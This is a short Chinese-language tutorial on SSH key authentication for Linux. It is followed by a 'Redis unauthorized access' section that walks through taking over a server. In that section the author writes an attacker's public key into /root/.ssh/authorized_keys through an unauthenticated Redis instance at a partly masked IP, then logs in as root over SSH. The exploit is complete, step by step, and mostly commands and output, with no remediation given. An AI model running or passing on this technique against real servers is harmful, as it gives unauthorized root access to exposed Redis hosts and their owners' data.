使用密鑰認證機制遠程登陸Linux

密鑰認證機制

建立存放key的文件

1）建立目錄 /root/.ssh 並設置權限

[root@localhost ~]# mkdir /root/.ssh mkdir 命令用來建立目錄，之後會詳細介紹，暫時只瞭解便可。

[root@localhost ~]# chmod 700 /root/.ssh chmod 命令是用來修改文件屬性權限的，之後會詳細介紹。

2）建立文件 / root/.ssh/authorized_keys

[root@localhost ~]# vim /root/.ssh/authorized_keys

生成Key

Xshell-【新建用戶密鑰生成嚮導】，密鑰類型選擇RSA，密鑰長度選擇2048位，生成密鑰名稱，加密的密碼。

複製生成的公鑰到遠程linux裏面 /root/.ssh/authorized_keys 文件中。若是沒有.ssh目錄，就自行創建，並更改目錄權限爲700。粘貼公鑰的內容，保存退出。

就能夠利用密鑰登陸了

漏洞場景-redis未受權訪問漏洞

1）本地生成祕鑰

root@XXX:~# ssh-keygen  -t rsa

2）將公鑰寫入一個文件

root@XXX:~# cd /root/.ssh/

root@XXX:~/.ssh# (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt

3）鏈接redis寫入文件

root@XXX:~/.ssh# cat foo.txt | redis-cli -h 210.73.90.xxx -x set crackit

OK
root@XXX:~/.ssh# redis-cli  -h 210.73.90.xxx

210.73.90.xxx:6379> config set dir /root/.ssh/
OK
(1.39s)
210.73.90.xxx:6379> CONFIG GET dir
1) "dir"
2) "/root/.ssh"
210.73.90.xxx:6379> config set dbfilename "authorized_keys"
OK
(1.03s)
210.73.90.xxx:6379> SAVE
OK
210.73.90.xxx:6379> exit
root@XXX:~/.ssh# ssh

4）鏈接服務器
root@XXX:~/.ssh# ssh -i id_rsa root@210.73.90.xxx